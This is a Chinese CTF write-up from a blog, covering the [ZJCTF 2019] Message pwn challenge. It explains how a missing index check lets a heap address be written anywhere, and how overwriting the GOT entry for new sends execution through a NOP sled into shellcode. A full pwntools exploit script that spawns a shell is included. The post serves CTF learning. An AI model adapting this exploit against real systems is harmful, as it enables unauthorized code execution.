[ZJCTF 2019]Mesage(地址值强制当成指令)

最新推荐文章于 2024-07-25 17:11:44 发布
最新推荐文章于 2024-07-25 17:11:44 发布
阅读量504 收藏
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106693964
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

[ZJCTF 2019]Mesage(地址值强制当成指令)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在edit功能里没有检查index,可以溢出,在任意地址处写一个堆地址。

那么,我们就可以把堆地址写到已存在的堆里,然后调用show就能打印出堆地址,然后,我们计算new的got表到堆地址之间的偏移,将new的got表改为一个堆地址。但是这个堆地址里面开始并不是存放shellcode,而是存放着一个堆指针。

通过构造堆,让堆末尾的地址为0xE8,这样,就可以解决问题了,因为0xE8强制转为指令就是这样

因此,我们只要在后方申请一个很大的堆,并在前方大片空间里填充nop,那么就一定可以滑行到主shellcode里

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
sh = process('./message1')
#sh = remote('node3.buuoj.cn',25086)
new_got = 0x00000000006040F0

def add(count,string):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('add?',str(count))
   for i in range(count):
      sh.sendlineafter('message',string)

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('index:',str(index))

def show():
   sh.sendlineafter('>>','3')

def edit(index,count,string):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('index:',str(index))
   sh.sendlineafter('add?',str(count))
   for i in range(count):
      sh.sendlineafter('message',string)

add(1,'a'*0x8)
edit(-3,1,'a'*0x8)
show()
sh.recvuntil('0:')
sh.recvuntil('0:')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
offset = (heap_addr - 0x20 - new_got) / 8
edit(0,4,'\x00'*0x18)
edit(0,1,'\x00'*0x18)

#new_got->chunk1[call xxx]->chunk2
edit(-1*offset,1,(asm(shellcraft.sh())).rjust(0x10000,'\x90'))
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('add?','1')

sh.interactive()

 

ha1vk
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1925
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
st3-gitblame:在Sublime Text中查看文件时显示Git责任信息
02-22
Git责备-Sublime Text 3的软件包 使用此软件包,您可以在Sublime Text中查看/编辑文件时查询Git的“ blame”信息。 责备信息会告诉您谁最后一次编辑了一行,他们何时进行了编辑,以及他们进行了哪些提交。...
[ZJCTF 2019]Login
、moddemod
07-03 844
exp from pwn import * context.log_level = 'debug' proc_name = './login' # p = process(proc_name) p = remote('node3.buuoj.cn', 29641) ...
[ZJCTF 2019]NiZhuanSiWei
satasun的博客
05-25 535
这道题涉及到的知识点: 1.data伪协议写入文件 2.php:// php://filter用于读取源码 php://input用于执行php代码 一进门就给了源码,看来是个代码审计题。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome t
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1107
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
ZJCTF 2019 Final 登录系统 WP
fjh1997的博客
10-02 1005
ZJCTF 2019 Final 登录系统 WP 复现 复现地址:http://ctf.fjh1997.top:8000/challenges WP 首先拖进IDA里一看,发现是64位的,再仔细看看,发现没有malloc,那么估计是栈题,也许是ROP利用,checksec走一波。 发现有Canary,估计要想办法绕过,但是找了半天没想到绕过方案遂放弃。 在ida里面继续找找,发现是验证用户密码的...
C#程序设计-3期(KC008) KC008110200020_如何在ASP.NET中用URL在页面之间传.docx
07-12
string mesage = Server.UrlEncode("明日科技"); ``` 接下来,使用`Response.Redirect`方法来重定向到新的页面,并在URL中附带参数。在`Redirect`方法中,我们可以添加查询字符串,如"Default2.aspx?msg=",然后...
浅谈Python程序的错误:变量未定义
12-17
`input()`会将输入的内容视为字符串,如果期望的是其他类型的(如整数、浮点数),需要对用户输入进行适当的类型转换,否则也会引起类似`xxx is not defined`的错误。例如,如果希望用户输入一个整数,应使用`int...
S7_1200组态做ModbusTcp服务器步骤.pdf
07-13
此时,可以通过检查CPU的诊断缓冲区查看错误信息,或者利用西门子提供的SIMATIC Mesage Service进行远程监控和诊断。 8. **安全考虑** - 为了保障网络安全,应设置适当的访问控制,限制非法设备对Modbus TCP服务器...
Python第二章-变量和简单的数据类型.pdf
01-10
在这种情况下,追踪信息会提示`mesage`变量未定义,因为Python找不到这个名称对应的。 此外,文档中还提到了简单的数据类型,包括字符串(str)和数(整数int和浮点数float)。字符串是文本数据,可以通过单...
2019-ZJCTF
ChenZIDu的博客
12-13 1104
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 474
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 395
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
企业如何保证公司内网安全
shunyou0526的博客
07-25 309
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1127
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 425
2024安全大模型技术与市场研究报告
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 818
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 672
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价最大化。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1178
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
def format(): # 利用字符串的连接制式输出 global smessage1, mesage2, success_times, click_times # 步骤2 代码写在这里
05-20
以下是可能的实现方式: ``` def format(): global smessage1, message2, success_times, click_times # 将需要输出的信息按照要求连接成一个字符串 output_string = "第一条消息:{}\n第二条消息:{}\n成功次数:{}\n点击次数:{}".format(smessage1, message2, success_times, click_times) # 输出字符串 print(output_string) ``` 这个函数将 `smessage1`、`message2`、`success_times` 和 `click_times` 四个变量的格式化成一个字符串,并打印输出。字符串的格式化使用了 Python 内置的字符串格式化语法。第一条消息和第二条消息的格式都是 `{}`,它们会依次用 `format` 方法中的第 1 个、第 2 个参数替换。例如,如果 `smessage1` 和 `message2` 分别是 `"Hello"` 和 `"world"`,那么格式化后的字符串就是 `"第一条消息:Hello\n第二条消息:world\n成功次数:0\n点击次数:0"`。`\n` 是换行符。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值